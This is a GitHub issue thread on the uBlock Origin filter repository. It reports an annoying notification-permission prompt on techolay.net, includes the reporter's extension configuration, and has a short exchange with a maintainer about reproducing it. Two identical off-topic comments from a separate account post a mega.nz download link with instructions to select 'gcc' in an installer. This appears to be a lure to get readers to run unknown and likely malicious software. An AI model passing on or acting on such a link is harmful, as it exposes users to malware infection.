### ISSUE TITLE
techolay.net: nuisance

### ISSUE THREAD

**Issue by Raidware** [uBlockOrigin/uAssets#25035]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [x] I have verified that other extensions are not causing the issue.
- [ ] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://techolay.net/sosyal/neler-yeni/`

### Category

nuisance

### Description

notification permission says give permission to activate permission, this is one of the annoying items

### Other extensions used

no

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

![Screenshot_20240825_123452](https://github.com/user-attachments/assets/71e3c105-9b2b-44ed-9dc9-1c2994337aa0)

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Chromium Mobile: 129
filterset (summary):
 network: 234278
 cosmetic: 229818
 scriptlet: 39308
 html: 0
listset (total-discarded, last-updated):
 added:
  adguard-spyware-url: 1662-124, never
  adguard-spyware: 79777-27047, never
  block-lan: 71-2, never
  curben-phishing: 532-0, 2m
  adguard-cookies: 31140-83, 4m
  ublock-cookies-adguard: 1693-9, 4m
  fanboy-cookiemonster: 51726-4039, 4m
  ublock-cookies-easylist: 1693-1693, 4m
  adguard-social: 23344-793, 2m
  fanboy-social: 16959-24, 2m
  fanboy-thirdparty_social: 68-0, 2m
  adguard-popup-overlays: 27877-1823, 9m
  [9 lists not shown]: [too many]
 default:
  user-filters: 0-0, never
  ublock-filters: 40052-623, 5m Δ
  ublock-badware: 10788-8, 9m
  ublock-privacy: 1072-2, 9m
  ublock-unbreak: 2508-0, 9m
  ublock-quick-fixes: 197-0, 5m Δ
  adguard-mobile: 9649-125, 9m
  easylist: 85516-885, 5m Δ
  easyprivacy: 53067-835, 9m
  urlhaus-1: 30530-0, 9m
  plowe-0: 3545-458, 9m
  TUR-0: 13740-31, 9m
filterset (user): [empty]
switchRuleset:
 added: [array of 1 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 1297 ms
 maxAssetCacheWait: 525 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 1
 network:
  techolay.net: 1
 extended:
  ##.fa-cookie
  ##.p-footer-rssLink
  ##.notice--cookieAdvanced
  ##.cookies-main
  ##.u-scrollButtons
```
</details>

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by mapx-** [comment]
test in firefox mobile using only the default settings / filter lists

**Comment by Raidware** [comment]
> test in firefox mobile using only the default settings / filter lists

![Screenshot_20240825_131749_Firefox](https://github.com/user-attachments/assets/bc2426f2-b7af-4f68-a89a-ab5fc6fdf07d)

**Comment by mapx-** [comment]
I tested in FF android, I get a different page.
How did you get that "yeni konular" ?

**Comment by Raidware** [comment]
> I tested in FF android, I get a different page. How did you get that "yeni konular" ?

just register the website and you will see this. in case no notificstion, click "yeni konular"

**Comment by Raidware** [comment]
why unable to reproduct? @mapx-
